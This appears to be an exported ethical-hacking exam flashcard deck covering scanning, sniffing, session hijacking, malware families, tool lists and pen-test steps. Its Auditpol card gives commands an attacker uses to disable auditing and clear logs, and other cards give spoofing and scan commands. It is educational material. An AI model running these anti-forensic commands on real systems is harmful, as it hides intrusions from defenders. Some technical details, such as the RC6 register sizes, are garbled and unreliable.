Slightly slower than MD5, but its larger message digest makes it more secure against brute-force collision and inversion attacks o SHA-0: 160-bit hash function which was withdrawn from the trade due to undisclosed "significant flaw" o SHA-1: It is a 160-bit hash function protect against for brute force o SHA-2: SHA2 is a family of two similar hash functions, with different block sizes, namely, -SHA-256, which uses 32-bit words, -SHA-512, which uses 64-bit words. Truncated versions of each standard are SHA-224 and SHA-384. o SHA-3: uses the sponge construction XORed message blocks which the algorithm then invertibly permutes. - two similar hash functions, with different block sizes, namely, differs in its internal structure considerably from rest of the SHA family.
Session Hijacking
Sniff valid session IDs to gain unauthorized access to the web server and snoop the data Burp Suite, -a web security testing tool that can hijack the session identifiers in established sessions. The Sequencer tool in Burp Suite tests the randomness of session tokens. With this tool, an attacker can predict the next possible session ID token, and use that to take over a valid session Firesheep, JHijack Ettercap Cookie Catcher Cookie Cadger
Sniffing in the Data Link Layer
Sniffers operate at the Data Link layer and can capture the packets from the Data Link layer also known as Layer 2 of OSI model In this layer, data packets are encoded and decoded into bits Upper layers are unaware because each works independently of the others
Passive Sniffing
Sniffing through a hub where all traffic is broadcast/public Involves sending no packets. It just captures and monitors the packets flowing in the network. this works only in a common collision domain Attackers use the following passive sniffing methods to get control over the target network: -Compromising the physical security -Using a Trojan horse
Non Electronic Attack
Social Engineering- Convincing people to reveal password Shoulder Surfing -Watching user login Dumpster Diving-Dig through trash for sensitive info
Source Code Analysis
Source code review - method that involves systematic examination of the source code for various types of vulnerabilities. - intended to detect and fix security mistakes made by the programmers during the development phase -A type of white-box testing Two types o Static o Dynamic
ISO/IEC 27001:2013
Specifies the requirements for establishing, implementing, maintaining, and continually improving an information security management system within the context of the organization.
Priv Esc Using Spectre & Meltdown Vulnerabilities
Spectre and Meltdown are vulnerabilities found in the design of the modern CPU chips from AMD, ARM, and Intel Spectre- can read adjacent memory locations of processes. Can be used to read kernal memory Meltdown- escalates privileges by forcing an unprivileged process to read the adjacent memories locations such as kernal and physical memory. Can reveal credentials and private keys. -Meltdown vulnerability is found in all the Intel processors and ARM processors deployed by Apple. This vulnerability leads to tricking a process to access out of bounds memory by exploiting CPU optimization mechanisms such as speculative execution. Affected performance
Hping2 www.certifiedhacker.com -a 7.7.7.7
Spoofing
Spyware Tools
Spytech SpyAgent -provides a large array of essential computer monitoring features, as well as website, application, and chat client blocking, logging scheduling, and remote delivery of logs via email or FTP. Power Spy - Screen recording, keyloggers, Instant message and chat recording, Email recording, Website URl recording, Application, document and clipboard text recording
Stages of Zeus Trojan
Stages 1. dropper contains executable code in the compressed form, encrypted form, or both. 2. the dropped trojan cmd.exe will execute the previously dropped batch files for deleting the dropper file (ssl.exe). 3. The cmd.exe injects its malicious code into running processes and waits for browser processes such as iexplorer.exe or firefox.exe to execute. 4. Without the user's knowledge, the Trojan requests the C&C Server to download a configuration file in the background. Following is the snapshot showing the requests sent to C&C Server (http://dns1.nsdnsrv.com) for downloading static.htmls files. 5. The ZeuS trojan dropper (ssl.exe) also creates processes like ogyr.exe at the initial stage, which are set to execute at runtime to maintain a connection with the C&C server every time the system gets restarted.
MAC Spoofing Technique: Windows
Start -> Control Panel -> Network and Internet -> Networking and Sharing Center -> Ethernet -> Properties -> configuartion -> Advanced -> Values (type in new Mac) -> ok -> ipconfig/all or net config rdr -> reboot system
Two basic types of Source Code Review
Static Code Analysis -This type of source code analysis is performed to detect the possible vulnerabilities in source code when the code is not executing, that is, is static. -source code analysis is performed using techniques such as Taint Analysis, Lexical Analysis, and Data Flow Analysis. Dynamic Code Analysis -analysis, the source code of the application is analyzed during execution of the code. -Is capable of detecting SQL injection-related security flaws encountered due to interaction of the code with SQL databases, web services, and so on.
Cloud Penetration Testing
Step 1: Check for Lock-in Problems Step 2: Check for Governance Issues Step 3: Check for Compliance Issues Step 4: Check Cloud for Resource Isolation Step 5: Check if Anti-malware Applications are Installed and Updated on Every Device Step 6: Check if CSP has installed Firewalls at Every Network Entry Points Step 7: Check if the provider has deployed Strong Authentication for Every Remote User Step 8: Check whether the Provider Encrypts Files Transferred to/from Cloud Servers Sep 9: Check whether Files Stored on Cloud Servers are Encrypted Step 10: Check the Data Retention Policy of Service Providers Step 11: Check whether All Users Follow Safe Internet Practices Step 12: Perform a Detailed Vulnerability Assessment Step 13: Check Audit and Evidence-Gathering Features in the Cloud Service Step 14: Perform Automated Cloud Security Testing Step 15: Document all the Findings
Denial-of-Service (DoS) Attack Penetration Testing
Step 1: Define the objective: Step 2: Test for heavy loads on the server: Step 3: Check for DoS vulnerable systems: Step 4: Run a SYN attack on the server: Step 5: Run port flooding attacks on the server Step 6: Run an email bomber on the email servers: Step 7: Flood the website forms and guestbook with bogus entries Step 8: Document all the findings
Session Hijacking Penetration testing
Step 1: Locate a session Step 2: Sniff session traffic between two machines Step 3: Crack Session ID encryption Step 4: Send Phishing email for Session Fixation Step 5: Make a normal connection with one machine Step 6: Collect several session IDs Step 7: Predict a new session ID Step 8: Replay new session ID Step 9: Brute force session IDs Step 10: Document all the findings
Steps of Fuzz Testing
Steps involved in performing attack - Identify the target system - Identify inputs - Generate fuzzed data - Execute the test using fuzz data - Monitor system behavior - Log defects
Static Malware Analysis- Performing Strings Search
String communicate info from the program to its user Analyze embedded strings of the readable text within the program's executable file Use tools such as BinText to extract embedded strings from executable files
HTTP Tunneling Tools
Super Network Tunnel -A two-way HTTP tunneling software that connects two computers utilizing HTTP-Tunnel Client and HTTP-Tunnel Server. -It works like VPN tunneling but uses HTTP protocol to establish a connection for accessing the Internet without monitoring and gives an extra layer of protection against attackers, spyware, identity theft, and so on. HTTPort and HTTHost -Allows users to bypass the HTTP proxy, which blocks Internet access to e-mail, instant messengers, P2P file sharing, ICQ, News, FTP, IRC, and so on. Tunna HTTP Tunnel
Active Sniffing
Switched network. Searches for traffic on a switched LAN by actively injecting traffic into the LAN. Involves injecting ARP packets into the network to flood the switch's Content Addressable Memory (CAM) Table, thus keeping track of host-port connections. Attack types -MAC flooding -DNS Poison -ARP Poison -DHCP attack -Switch port stealing -Spoofing attack
Web Application Security Scanners
Syhunt Hybrid -scanner automates web application security testing and guards the organization's web infrastructure against web application security threats. -crawls websites and detects XSS, directory transversal problems, fault Injection, SQL Injection, attempts to execute commands, and multiple other attacks N-Stalker -a WebApp Security Scanner that searches for vulnerabilities such as Clickjacking, SQL injection, XSS, and known attacks -This tool checks for Web Signature attacks, Cookie Exposure, and so on and every known Web development platform is supported which interacts through the HTTP protoco Skipfish Burp Suite Netsparker Web Application Security Scanner Detectify
RC6
Symmetric key block cipher that uses integer multiplication & 4-bit working registers symmetric key block cipher derived from RC5 Two deference o integer multiplication (which is used to increase the diffusion achieved in fewer rounds and increased speed of the cipher o Uses Four 4-bit registers in place of the two 2-bit registers because the block size of the AES is 128 bits.
TCP Connect / Full Open Scan
TCP Connect scan completes a three-way handshake with the target machine. -the operating system's TCP connect() system call tries to open a connection to every interesting port on the target machine. If the port is listening, the connect() call will result in a successful connection with the host on that particular port; otherwise, it will return an error message stating that the port is not reachable. -one of the most reliable forms of TCP scanning. Easiest to detect, but most reliablenmap -sT
-sT (TCP connect scan)
TCP connect scan is the default TCP scan type when SYN scan is not an option. This is the case when a user does not have raw packet privileges. Instead of writing raw packets as most other scan types do, Nmap asks the underlying operating system to establish a connection with the target machine and port by issuing the connect system call.
Services and Ports to Enumerate
TCP/UDP 53: DNS Zone Transfer TCP/UDP 135: Microsoft RPC Endpoint Mapper UDP137: NetBIOS Name Service (NBNS) TCP139: NetBIOS Session Service (SMB over NetBIOS) UDP 161: Simple Network Management protocol (SNMP) TCP/UDP 389: Lightweight Directory Access Protocol (LDAP TCP/UDP 3268: Global Catalog Service TCP 25: Simple Mail Transfer Protocol (SMTP) TCP/UDP 162: SNMP Trap UDP 500: ISAKMP/Internet Key Exchange (IKE) TCP/UDP 5060, 5061: Session Initiation Protocol (SIP)
Automated Vulnerability Detection System (AVDS)
Tests every node according to its characteristics and records system responses to reveal security issues A network vulnerability assessment appliance for networks of 50 to 200,000 nodes. It performs an in-depth inspection for security weaknesses that can replace exhaustive penetration testing. With each scan, it will automatically find new equipment and services and add them to the inspection schedule It conducts automated vulnerability assessment scans daily, weekly or monthly, or on ad-hoc basis. It records results and generates vulnerability trends for your entire WAN, a LAN or a single IP address. W
Use the web filtering application to prevent the employees from accessing the phishing webpage.
Teyla is a security analyst for BAYARA Company. She is responsible for the firewall, antivirus, IPS, and web filtering security controls. She wants to protect the employees from a new phishing attack.What should Teyla do? -Block outbound traffic to the ports 80 and 443 in the firewall. -Block the phishing via antivirus. -Use IPS to block phishing. -Use the web filtering application to prevent the employees from accessing the phishing webpage.
RADIUS
The 802.1X standard provides centralized authentication. 802.1X authentication to work on a wireless network, the AP must be able to securely identify the traffic from a specific wireless client. In this Wi-Fi authentication process, a centralized authentication server known as Remote Authentication Dial in User Service sends authentication keys to both the AP and to clients that want to authenticate with the AP. This key enables the AP to identify a particular wireless client.
Escalate privileges in the Windows operating system
The Windows operating system uses Windows application compatibility framework called Shim to provide compatibility between the older and newer versions of Windows. An attacker can use these shims to perform different attacks such as disabling Windows defender, privilege escalation, installing backdoors, and so on.
VoIP Enumeration
The advanced technique that has replaced traditional PSTN in both corporate and home environments. This SIP service generally uses UDP/TCP ports 2000, 2001, 5050, 5061. Attackers use Svmap and Metasploit tools to perform VoIP enumeration
Application Level Session Hijacking
The attacker is looking for a legitimate session ID from the victim in order to gain access to an authenticated session that allows the attacker to avail web resources. -This is about gaining control over the HTTP user session by obtaining the session IDs. an attacker steals or predicts a valid session to gain unauthorized access to the web server.
SYN attack / Flooding
The attacker sends a large number of incomplete SYN requests to target server (victim) with fake source IP addresses. The attack creates incomplete TCP connections that use up network resources. The attacker exploits the "three-way handshake" method. First, the attacker sends a fake TCP SYN request to the target server and when the server sends back a SYN/ACK in response to the client's (attacker) request, the client never sends an ACK response. This leaves the server waiting to complete the connection. Countermeasures -Proper packet filtering is a viable solution. -An administrator can also modify the TCP/IP stack. -Tuning the TCP/IP stack will help reduce the impact of SYN attacks while allowing legitimate client traffic through. -Decreasing the time-out period to keep a pending connection in the "SYN RECEIVED" state in the queue Two tools to counter this attack are SYN cookies and SynAttackProtect.
Steps involved in TCP/IP hijacking:
The attacker sniffs the victim's connection and uses the victim's IP to send a spoofed packet with the predicted sequence number The receiver processes the spoofed packet, increments the sequence number, and sends acknowledgement to the victim's IP The victim machine is unaware of the spoofed packet, so it ignores the receiver machine's ACK packet and turns sequence number count off Therefore, the receiver receives packets with the incorrect sequence number The attacker forces the victim's desynchronized state The attacker tracks sequence numbers and continuously spoofs packets that comes from the victim's IP The attacker continues to communicate with the receiver machine while the victim's connection hangs
Meet-in-the-Middle Attack on Digital Signature Schemes
The best attack method for cryptographic algorithms using multiple keys for encryption. This attack reduces the number of brute force permutations needed to decode text encrypted by more than one key and conducted mainly for forging signatures on mixed type digital signatures. A meet-in-the-middle attack uses space-time trade-off
Auditpol.exe
The command-line utility tool to change Audit Security settings at the category and sub-category levels. Can be used to enable or disable security auditing on local or remote systems and to adjust the audit criteria for different categories of security events. The attacker would establish a null session to the target machine and run the command: C:\>auditpol \\<ip address of target> This will reveal the current audit status of the system. He or she can choose to disable the auditing by: C :\>auditpol \\<ip address of target> /disable This will make changes in the various logs that might register the attacker's actions. He/she can choose to hide the registry keys changed later on. The moment that intruders gain administrative privileges, they disable auditing with the help of auditpol.exe. Once they complete their mission, they again turn on auditing by using the same tool (audit.exe). Command to view defined auditing settings on the target computer, auditpol /get /category:* Run for clearing application logs C:\clearlogs.exe -app
Information Gathering
The first and one of the important steps toward hacking a target web server. Attackers may search the Internet, newsgroups, bulletin boards, and so on for information about the target organization. Tools whois.net -Lets you perform a domain whois search, whois IP lookup, and search the whois database for relevant information on domain registration and availability. Robots.txt -A website owner creates robots.txt file to list for a web crawler those files or directories it should index in search results.
RSA signature scheme
The first technique used to generate digital signatures. It is a deterministic digital signature scheme that provides message recovery from the signature itself, making it the most practical and versatile technique available.
IPsec Enumeration
The most commonly implemented technology for both gateway-to-gateway (LAN-to-LAN) and host to gateway (remote access) enterprise VPN solutions. Provides data security by employing various components like ESP (Encapsulation Security Payload), AH (Authentication Header), and IKE (Internet Key Exchange) to secure communication between VPN end-points Most IPsec based VPNs use ISAKMP (Internet Security Association Key Management Protocol), a part of IKE, cryptographic keys in a VPN environment Attacker can perform a simple direct scanning for ISAKMP at UDP port 500 with tools like Nmap, etc. nmap -sU -p 500 10.10.10.11 -perform Nmap scan for checking the status of isakmp over port 500
Authentication Attacks
The objective of these attacks is to steal the identity of Wi-Fi clients, their personal information, login credentials, etc. to gain unauthorized access to network resources Type o PSK Cracking o LEAP Cracking o VPN Login Cracking o Domain Login Cracking o Identity Theft o Shared Key Guessing o Password Speculation o Application Login Theft o Key Reinstallation Attack
Android Device Administration API
These APIs allow developers to create security-aware applications that are useful in enterprise settings, in which IT professionals require rich control over employee devices. One can use a device administration ("admin") API to write device admin applications that users install on their devices. Policys supported o password enabled o Alphanumeric password required o Complex password required o Minimum length, letters, lowercase letters required in password o Minimum nonletter characters required in password o Minimum symbols, uppercase letters, numerical digits required in password o Password expiration timeout and history restriction o Maximum failed password attempts,inactivity time lock o Require storage encryption Disable camera
Honeypot Access Point (AP)
These APs mounted by the attacker are called "honeypot" APs. They transmit a stronger beacon signal than the legitimate APs. NICs searching for the strongest available signal may connect to the rogue AP. Setting an AP's SSID to be the same as that of a legitimate AP -Manipulating SSID ex: fake McDonald's network
Blind SQL Injection: Heavy Query
This can be used to perform time delay SQL injection attack without using time delay functions. Newest type of sql attack
Firmalyzer
This tool enables device vendors and security professionals to perform automated security assessment on software that powers IoT devices (firmware) in order to identify configuration and application vulnerabilities
Qualys Free Scan
This tool enables you to safely and accurately scan your network, servers, desktops and web apps for security threats and vulnerabilities.
Netsparker
This tool finds and reports web application vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) on all types of web applications regardless of the platform and technology they are built with. Features: o Automatic Detection: Automatically detect XSS, SQL Injection and other web application vulnerabilities. o Dead Accurate: Use your time fixing vulnerabilities and not verifying the scanner's findings. o Scalable: Easily scan 100s and 1000s of web applications simultaneously with a fully scalable service. o Integration: Easily integrate web security scanning in the SDLC and continuous development systems.
Multiple APs
This type of network connects computers wirelessly by using multiple APs. If a single AP cannot cover an area, multiple APs or extension points can be established.
Botnet Trojan Tools
Tools - Dreambot - Cridex - Ponmocup - Avalanche - Windigo - Ramnit - Mirai - Necurs - PlugBot - Proteus Malware - Cythosia DDoS bot - Andromeda Bot - Dorkbot
Proxy Server Trjan Tools
Tools - Linux.Proxy.10 - Proxy - Pinkslipbot (Qbot)
DoS/DDoS Attack Tools for Mobile
Tools -LOIC - AnDOSid -DDOS -DDoS -Packets Generator -PingTools Pro
Mobile Hijacking Tools
Tools Droidsheep -session hijacking on Android devices connected on common wireless network DroiSniff -an Android app for Security analysis in wireless networks and capturing Facebook, Twitter, LinkedIn and other accounts. FaceNiff -an Android app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it will work on any private network (Open/WEP/WPA-PSK/WPA2-PSK).
Ransomeware Tools
Tools GoldenEye Chimera Hidden Tear & EDA2 Fantom Mischa Shark HolyCrypt CryPy Stampado -Wannacry -Petya -NotPetya
Exploit KIt Tools
Tools - Magnitude - Angler - Neutrino - Terror - Sundown - Pheonix - Blackhole - Bleedinglife - Crimepack - Hunter - Nuclear -RIG Exploit Kit
Backdoor Trojan Tools
Tools -Kovter - Nitol - Qadars - Snake - Trojan.Ismagent - BackDoor.Ragebot.45 - z3r0 Remvio - Backdoor.Psiload - PoisionIvy
Monitoring Web Pages for Updates and Changes
Tools -WebSite- Watcher helps to track websites for updates and automatic changes. When an update or change occurs, WebSite-Watcher automatically detects and saves the last two versions onto your disk -VisualPing -Follow That Page -WatchThatPage -OnWebChange -InfoMinder -UpdateScanner -Verisionista
Cryptanalysis Tools
Tools to analyze and break the ciphers o CrypTool -project develops e-learning programs in the area of cryptography and cryptanalysis. It consists of e-learning software (CT1, CT2, JCT, and CTO). o CryptoBench o Cryptol o Ganzúa o EverCrack o AlphaPeeler o Mediggo o SubCyphe
Windows way of tracing packets
Tracert -d -Do not resolve addresses to hostnames. -h maximum_hops -Maximum number of hops to search for target. -j host-list -Loose source route along host-list (IPv4-only). -w timeout -Wait timeout milliseconds for each reply. -R -Trace round-trip path (IPv6-only). -S srcaddr -Source address to use (IPv6-only). -4 -Force using IPv4. -6 -Force using IPv6.
Post Attack Forensic
Traffic Pattern Analysis -the traffic pattern tool stores post-attack data, which users analyze for the special characteristics of the attacking traffic -These data are helpful in updating load balancing and throttling countermeasures to enhance their efficiency and protection ability. Run Zombie Zapper Tool -When a company is unable to ensure the security of its servers and a DDoS attack starts, the network IDS notices the high volume of traffic that indicates a potential problem. The targeted victim can run Zombie Zapper to stop the packets from flooding the system -two versions of Zombie Zapper: one runs on UNIX and the other runs on Windows systems. -this tool acts as a defense mechanism against Trinoo, TFN, Shaft, and Stacheldraht Packet Traceback -It is similar to reverse engineering. The targeted victim works backwards by tracing the packet to its original source. -This information can be of help in developing and implementing different filtering techniques to block the attack. Event Log Analysis -helps when an attacker causes destruction resulting in severe financial damage. -Allows network administrators to recognize the type of DDoS attack or a combination of attacks used.
Direct Action or Transient Viruses
Transfer all the controls of the host code to where it resides in the memory The virus runs when the host code is run and terminates itself or exist memory as soon as the host code execution ends it operates only for a short period and goes directly to the disk to search for programs to infect
Types of IDS Alerts
True Positive (Attack - Alert): - occurring when an event triggers an alarm and causes the IDS to react as if a real attack is in progress. False Positive (No attack - Alert): -Occurs if an event triggers an alarm when no actual attack is in progress. False Negative (Attack - No Alert): -Occurred when an IDS fails to react to an actual attack event. True Negative (No attack - No Alert): -Occurred when an IDS identifies an activity as acceptable behavior and the activity is acceptable.
Pen Test: Hiding Files
Try to install a rootkit in the target system to maintain hidden access Perform Integrity Based Detection -Signature Based Detection -Cross View Based Detection, -Heuristic Detection techniques to detect rootkits Use anti-rootkits -Stinger, -Avast Rootkit -TDSSKiller -Malwarebytes Anti-Rootkit -Rootkit Buster Use NTFS Alternate Data Stream (ADS) to inject malicious code on a breached system and execute them without being detected by the user Use NTFS stream detectors -Stream Armor - Stream Detector - Forensic Toolkit -ADS Manager Use steganography techniques to hide a secret message within an ordinary message and extract it at the destination to maintain confidentiality of the data Use steganography detection tools to perform steganalysis -Gargoyle Investigator -TM Forensic Pro -StegAlyzerSS -Steganography Studio -StegAlyzerAS
Pen Test: Priv Escalation
Try to log in with enumerated usernames and cracked password -Try to tun services as unprivialged account -Perform DLL Hijacking -Try to exploit Vulnerabilitys -Perform Dylib Hijacking -Try varoius privialge escalation techniques >token manipulation >application shimming >file system Permissions Weakness >Path Interception >Scheduled Task >Launch Daemon >Plist Modification >Setuid and Setgid >Web Shell
Evasion Technique: Obfuscated Code
Two ways o Wrapping: An attacker uses a wrap utility to obfuscate malicious SQL query, and then sends it to the database. An IDS signature will not detect such an obfuscated query and will allow it to pass through, as it does not match the IDS signature. o SQL string obfuscation: In the SQL string obfuscation method, SQL strings are obfuscated using a concatenation of SQL strings, encrypting or hashing the strings, and then decrypting them at runtime. -not detected in the IDS signature
Jamming Attack
Type of attack in which the communication between wireless IoT devices are jammed in order to compromise it An attacker transmits radio signal randomly with a frequency as the sensor nodes are sending signals for communication As a result the network gets jammed making endpoints unable to send or receive any message
National Vuln Dbase (NVD)
U.S. govt repository of standards-based vuln mgmt. data using Security Content Automation Protocol (SCAP). Enables automation of vuln mgmt, security measurement & compliance. Includes DBs of security checklist references, SW flaws, misconfigs, product names & impact metrics. pg 152
hping3 -2 10.0.0.25 -p 80
UDP scan on port 80 -2 -Connection less Scan -It returns an ICMP port unreachable message if it finds the port closed, and does not respond with a message if the port is open. -You may use either --udp of -2 arguments in the command line
-sU (UDP scans)
UDP scan works by sending a UDP packet to every targeted port.
UDP Scanning
UDP scanners interpret lost traffic as open ports.
Types of USB Attacks
USB Dumper -copies the files and folders from the flash drive silently when it connected to the pc. It transfer the data from a removable USB drive to a directory named 'USB' by default, with an option to change it. USB Grabber -allows users to connect any analogue audio/video source to the system through a USB port. USB Sniffer -monitors the activity of USB ports on the system. USB Snoopy- is a sort of viewer of the USB traffic.
ARP Poisoning Tools
Ufasoft Snif - an automated ARP poisoning tool that sniffs passwords and emails messages on a wired network or Wi-Fi network. BetterCAP Ettercap MITMf Cain & Abel Arpoison hping3
DNS TXT record
Unstructured text records
Jailbreaking Techniques
Untethered Jailbreaking Semi-tethered Jailbreaking Tethered Jailbreaking
LDAP enumeration countermeasures
Use SSL or START to encrypt it (unencrypted by default) Select username different from email Enable account lockout
Rolling Code Attack
Use locking smart system that includes RF signal transmitted in the form of a code from a modern key fob that locks or unlocks the vehicle This code which locks or unlocks a car or a garage is also known as Hopping code Attacker using jammer to thwart the transmission of a code from the key fob to the receiver in the vehicle After obtaining the code, an attacker can use it to unlock and steal the vehicle
DoS/DDoS Countermeasure
Use strong encryption mechanisms such as WPA2 and AES 256 for broadband networks to withstand against eavesdropping Ensure that the software and protocols are up-to-date and scan the machines thoroughly to detect any anomalous behavior Update kernel to the latest release and disable unused and insecure services Block all inbound packets originating from the service ports to block the traffic from reflection servers Enable TCP SYN cookie protection Prevent the transmission of the fraudulently addressed packets at ISP level
IKE-scan
Used for Ipsec Enumeration -discovers IKE hosts and can also fingerprint them using the retransmission backoff pattern -Can be used for discovery, Fingerprinting, Transfrom Enumaration, User Enumeration and Preshared cracking ike-scan -M <target gateway Ip address> -IPsec VPN discovery with ike-scan
Reflector Antenna
Used to concentrate EM energy that is radiated or received at a focal point. -Generally parabolic. -If in tolerance limit, it can be used as a primary mirror for all the frequencies. -Can prevent interference while communicating with other satellites. The larger the antenna reflector in terms of wavelengths, the higher the gain -cost of the antenna is high
Long-range communication : Very Small Aperture Terminal
VSAT is a communication protocol that is used for data transfer using small dish antennas for both broadband data and narrowband data
Disk Encryption Tools
VeraCrypt - is a software for establishing and maintaining an on-the-fly-encrypted volume (data storage device) Symantec Drive Encryption - (formerly PGP Whole Disk Encryption) provides organizations with complete, transparent drive encryption for all data (user files, swap files, system files, hidden files, etc.) on laptops, desktops, and removable media. BitLocker Drive Encryption - is a data protection feature that integrates with the operating system and addresses the threats of data theft or exposure from lost, stolen, or inappropriately decommissioned computers. o Gillsoft Full Disk Encryption o Endpoint Full Disk Encryption o Dell Data Protection | Encryption o AxCrypt o Folder Lock o Full Disk Encryption Software o SafeGuard Encryption
Source Code Analysis Tools
Veracode (https://www.veracode.com) RIPS (http://rips-scanner.sourceforge.net) PVS studio (https://www.viva64.com) Coverity Code Advisor (https://scan.coverity.com) Parasoft Test (https://www.parasoft.com) CAST Application Intelligence Platform (AIP) (http://www.castsoftware.com) Klocwork (https://www.klocwork.com) SONAR Qube (https://www.sonarqube.org) Flawfinder (https://www.dwheeler.com) Roslyn Security Guard (https://dotnet-security-guard.github.io) FlexNet Code Insight (https://www.flexera.com) Find Security Bugs (http://find-sec-bugs.github.io) Brakeman (https://brakemanscanner.org) php-reaper (https://github.com) Yasca (http://www.scovetta.com) VisualCodeGrepper (https://sourceforge.net)
Shell Viruses
Virus code forms a shell around the target host program's code, making itself the original program and host code as its sub-routine Almost all boot program viruses are shell viruses
Logic Bomb Viruses
Virus that is triggered by a response to an event it is a virus that is programmed to execute when a specific data is reached
Macro Viruses
Viruses infect templates or convert infected documents into template file, while maintaining their appearance of ordinary document files files are created by Microsoft Word or Excel, written using macro language VBA Visual Basic of Applications
Attack Area : Ecosystem access control
Vulnerability present it this competent are Implicit Trust between Components, Enrollment Security, Decommissioning System and Lost Access Procedures
Attack Areas of Mobile Application
Vulnerability present it this competent are Implicitly Trusted by Device or Cloud, Username Enumeration, Account Lockout, Known Default Credentials or Weak Passwords, Insecure Data Storage
Attack Area : Device Network Service
Vulnerability present it this competent are Information Disclosure Firmware, Denial-of-Service, UPnP, Vulnerable UDP Services, User and admin CLI, Injection and Unencrypted services and Poorly implemented encryption
Attack Area : Vendor Backend API's
Vulnerability present it this competent are Inherent Trust of Cloud or Mobile Application, Weak Authentication and Weak Access Controls.
Attack Area : Network Traffic
Vulnerability present it this competent are LAN, LAN to internet, Short range and non-standard o LAN -Before deploying LAN, it should be kept in mind that the location is secure and on the software level firewall should be deployed to keep hackers away from the network. o LAN to Internet - The very first thing while deploying LAN is the location. Ensure that it is secure and proper security policies and practices are followed to enhance the network's security making it difficult for the attacker to breach the network security. o Short Range - In order to make the short-range communication secure, a good security design should be implemented that hardens the device's security. o Non-standard - Each piece of network traffic passing through should be standardized and should be checked before leaving or coming into the network.
Attack Area : Administrative Interface
Vulnerability present it this competent are SQL Injection, Cross-site Scripting and Cross-site Request Forgery, Username Enumeration and Known Default Credentials , Weak Passwords and Account Lockout , Security/encryption and Logging options, Two-factor authentication and Inability to wipe device
Attack Area : Device web interface
Vulnerability present it this competent are SQL Injection, Cross-site Scripting, Cross-site Request Forge, Username Enumeration, Weak Password, Account Lockout and Known Default Credentials
Attack Area : Device memory
Vulnerability present it this competent are clear-text credentials, third-party credentials and encryption keys
dotDefender
Web Application firewall This s a software based Web Application Firewall that protects your website from malicious attacks such as SQL injection, path traversal, cross-site scripting, and others that result in web site defacement. It complements the network firewall, IPS, and other network-based Internet security products. It inspects HTTP/HTTPS traffic for suspicious behavior. Features: o Handle .NET Security issues o Enterprise-class security against known and emerging hacking attacks o Solutions for hosting, enterprise, and SMB/SME o Supports multiple platforms and technologies (IIS, Apache, Cloud, etc.) o Open API for integration with management platforms and other applications o Prevents denial-of-service (DoS) attacks
Attack Web Services
Web Services Probing -Attacks WSDL files are automated documents comprised of sensitive information about service ports, connections formed between two electronic machines, and so on. Attackers can use WSDL probing attacks to obtain information about the vulnerabilities in public and private web services, as well as to allow them to perform an SQL attack Web Service Attacks: -SOAP Injection Simple Object Access Protocol (SOAP) is a lightweight and simple XML-based protocol designed to exchange structured and type information on the web. Web Service Attacks: -XML Injection Web applications sometimes use XML to store data such as user credentials in XML documents; attackers can parse and view such data using XPATH. XPATH defines the flow of the document and verifies user credentials, such as the username and password, to redirect to a specific user account Web Services Parsing - Attacks Parsing attacks exploit vulnerabilities and weaknesses in the processing capabilities of the XML parser to create a denial-of-service attack or generate logical errors in web service request processing. -A parsing attack is faced when an attacker succeeds in modifying a file request or string. The attacker changes the values by superimposing one or more operating system commands via the request. Parsing is possible when the attacker executes the .bat (batch) or .cmd (command) files
Nikto
Web server assessment Features: SSL Support (Unix with OpenSSL or maybe Windows with ActiveState's Perl/NetSSL) Full HTTP proxy support Checks for outdated server components Saves reports in plain text, XML, HTML, NBE or CSV Template engine to easily customize reports Scans multiple ports on a server, or multiple servers via input file LibWhisker's IDS encoding techniques Identifies installed software via headers, favicons and files Host authentication with Basic and NTLM Subdomain guessing Apache and cgiwrap username enumeration Scan tuning to include or exclude entire classes of vulnerability checks Guesses credentials for authorization realms (including many default id/pw combos)
Attack Web Servers
Web server vulnerabilities provide attackers with a path to exploit the web apps hosted on them o WebInspect -an automated and configurable web application security and penetration-testing tool that mimics real-world hacking techniques and attacks, enabling attackers to analyze the complex web applications and services for security vulnerabilities. Metasploit Nikto Nessus Acunetix
The Data enter/ CLOUD point of attack
Web server-based Database.
Using App Server as a Proxy
Web servers with these functions enabled are employed by the attackers to perform following attacks: - Attacking third-party systems on internet - Connecting to arbitrary hosts on the organization's internal network - Connecting back to other services running on the proxy host itsel Attackers use GET and CONNECT requests to use vulnerable web servers as proxies to connect and obtain information from target systems through these web servers.
TTL:45 Window Size: 0x7D78 (or 32120 in decimal) DF: The Don't Fragment bit is set TOS: 0x0
What four passive banner grabbing components can be gleaned from this packet capture? 04/20-21:41:48.129662 129.142.224.3:659 -> 172.16.1.107:604 TCP TTL:45 TOS:0x0 ID:56257 ***F**A* Seq: 0x9DD90553 Ack: 0xE3C65D7 Win: 0x7D78
Finding Directory Listings of Web Server
When a web server receives a request for the directory rather than the actual file, the web server responds to the request in the following ways: Return Default Resource within directory - It may return a default resource within the directory, such as index.html Return Error -It may return an error, such as the HTTP status code 403, indicating that the request is not permitted Return listing of directory content -It may return a listing showing the contents of the directory. A sample directory listing is illustrated in the below screenshot.
Continues to evaluate the packet until all rules are checked
When an alert rule is matched in a network-based IDS like snort, the IDS does which of the following. -Continues to evaluate the packet until all rules are checked -Drops the packet and moves on to the next one -Blocks the connection with the source IP address in the packet -Stops checking rules, sends an alert, and lets the packet continue
False-positive
When analyzing the IDS logs, the system administrator noticed an alert was logged when the external router was accessed from the administrator's computer to update the router configuration. What type of an alert is this? -False-positive -True-negative -True-positive -False-negative
False negative
When analyzing the IDS logs, the system administrator notices connections from outside of the LAN have been sending packets where the source IP address and destination IP address are the same. However, no alerts have been sent via email or logged in the IDS. Which type of an alert is this? -False positive -True negative -False negative -True positive
Command Injection Attack
When input is used in the construction of a command that is subsequently executed by the system with the privileges of the Web server Theses flaws allow attackers to pass malicious code to different systems via web applications
Push alias "PSH":
When its flag is set to "1," it indicates that the sender has raised the push operation to the receiver The system raises the this flag at the time of start and end of data transfer and sets it on the last segment of a file to prevent buffer deadlocks
Microsoft Authentication
When users log in to a Windows computer, a series of steps is performed for user authentication. The Windows operating system authenticates its users with the help of three mechansims (protocols) SAM, NTLM, and Kerberos. Passwords are stored in Security Accounts Manager (SAM) or Database (Active Directory) -The SAM file uses a SYSKEY function (in Windows NT 4.0 and later versions) to partially encrypt the password hashes. LM authentication has been disabled in versions after Vista. LM will be blank in those systems -LM hashes limit the password length to a maximum of 14 characters. NTLM authentication- store pwd hash in SAM Kerberos authentication- stronger than NTLM
Honeypot
